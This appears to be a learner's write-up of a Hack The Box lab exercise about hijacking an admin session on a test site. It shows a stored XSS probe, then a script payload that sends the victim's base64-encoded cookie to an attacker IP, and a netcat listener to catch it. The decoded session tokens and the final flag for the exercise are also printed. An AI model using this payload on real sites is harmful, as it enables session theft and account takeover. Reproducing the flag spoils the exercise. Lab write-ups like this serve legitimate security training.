Skills Assessment
Task
You are currently participating in a bug bounty program.
- The only URL in scope is
http://minilab.htb.net - Attacking end-users through client-side attacks is in scope for this particular bug bounty program.
- Test account credentials:
- Email: heavycat106
- Password: rocknrol
- Through dirbusting, you identified the following endpoint
http://minilab.htb.net/submit-solution
Find a way to hijack an admin’s session. Once you do that, answer the two questions below.
Read the flag residing in the admin’s public profile. Answer format: [string] Go through the PCAP file residing in the admin’s public profile and identify the flag. Answer format: FLAG{string}
Attempt
After logging in, I checked the login request. The auth cookie was quite long and it didn’t look like easily crackable (i.e. weak md5).
On http://minilab.htb.net/app/, I tried xss against forms.
Payload:
<img src=x onerror=alert(window.origin)>
Telephone and Country fields didn’t validate the input.
Access http://minilab.htb.net/[email protected] and the popup appeared http://minilab.htb.net. The Country field shows a broken image so it must be vulnerable to stored xss.
Now I need to set a cookie stealer:
<script>fetch(`http://10.10.14.102:9000?cookie=${btoa(document.cookie)}`)</script>
Note that using backticks are important here. Do not use single quotes because backticks denote template literals.
Also set up nc:
nc -lnvp 9000
Let’s confirm if I can get my cookie (base64 encoded):
YXV0aC1zZXNzaW9uPXMlM0FBejFUNFpIYVVLbXBmSml0SjhFNW1iaFlQaWs4UWVkLS5hRXlFOFh5TFdvcURtZXBRMVpvSVZCdkpPSUtuUDlFSm5rJTJCNHJQc1RLams=
Decoded and got this:
auth-session=s%3AAz1T4ZHaUKmpfJitJ8E5mbhYPik8Qed-.aEyE8XyLWoqDmepQ1ZoIVBvJOIKnP9EJnk%2B4rPsTKjk
This matches my cookie value.
Now go to http://minilab.htb.net/submit-solution?url=http://minilab.htb.net/[email protected].
Got this:
YXV0aC1zZXNzaW9uPXMlM0F0RkRUUC1GYlM0RGdNWVZmbG91Y2t0eEI5azlWNTNSSC55T3pKSHlMeVI5V1piOVM1RWtYbFp2WTJJTU1NNFdRV0NaR1VNcktvT2xR
Decoded:
auth-session=s%3AtFDTP-FbS4DgMYVfloucktxB9k9V53RH.yOzJHyLyR9WZb9S5EkXlZvY2IMMM4WQWCZGUMrKoOlQ
Using this token, I logged in as the admin. I changed his visibility to public. There was a flag in share page.
Next, I turned off burp, downloaded a pcap file and opened it using wireshark.
Pressed ctrl+f to search the string flag and found the flag.
token=FLAG{SUCCESS_YOU_PWN3D_US_H0PE_YOU_ENJ0YED}